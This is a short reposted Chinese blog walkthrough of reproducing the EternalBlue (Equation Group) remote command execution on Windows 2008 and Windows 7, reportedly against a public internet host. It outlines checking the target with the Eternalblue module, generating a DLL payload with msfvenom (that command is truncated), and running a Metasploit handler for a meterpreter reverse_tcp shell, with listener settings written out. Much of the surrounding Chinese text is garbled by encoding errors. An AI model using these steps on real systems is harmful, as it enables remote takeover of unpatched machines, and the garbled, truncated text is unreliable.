方程式漏洞之复现window2008/win7 远程命令执行漏洞
生活随笔
收集整理的這篇文章主要介紹了
方程式漏洞之复现window2008/win7 远程命令执行漏洞
小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
前幾天就想寫的,因?yàn)橐恍┚壒示蜎]寫。此次是在外網(wǎng)環(huán)境下進(jìn)行的。大家在內(nèi)網(wǎng)中也一個(gè)樣。
方法:
使用Eternalblue模塊,劍測(cè)是否有漏洞然后msf生成一個(gè)dll直接反彈shell.
PS:win版本的不知道緣何生成出來的dll是0kb 我就在自己本地的虛擬機(jī)生成了一個(gè)dll。生成dll命令
msfvenom -p windows
然后copy到了自己的測(cè)試機(jī)。
測(cè)試機(jī)IP:118.244.x.x
被攻擊者IP:119.29.x.x
MSF監(jiān)聽命令:
use exploit/multi/handler
set LHOST?192.168.1.109
set LPORT?6566
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run
成功。
?
在測(cè)試當(dāng)中,發(fā)現(xiàn)win7的會(huì)被藍(lán)屏,而08的卻不會(huì)
?
總結(jié)
以上是生活随笔為你收集整理的方程式漏洞之复现window2008/win7 远程命令执行漏洞的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 软件项目管理-会议记录模板
- 下一篇: java信息管理系统总结_java实现科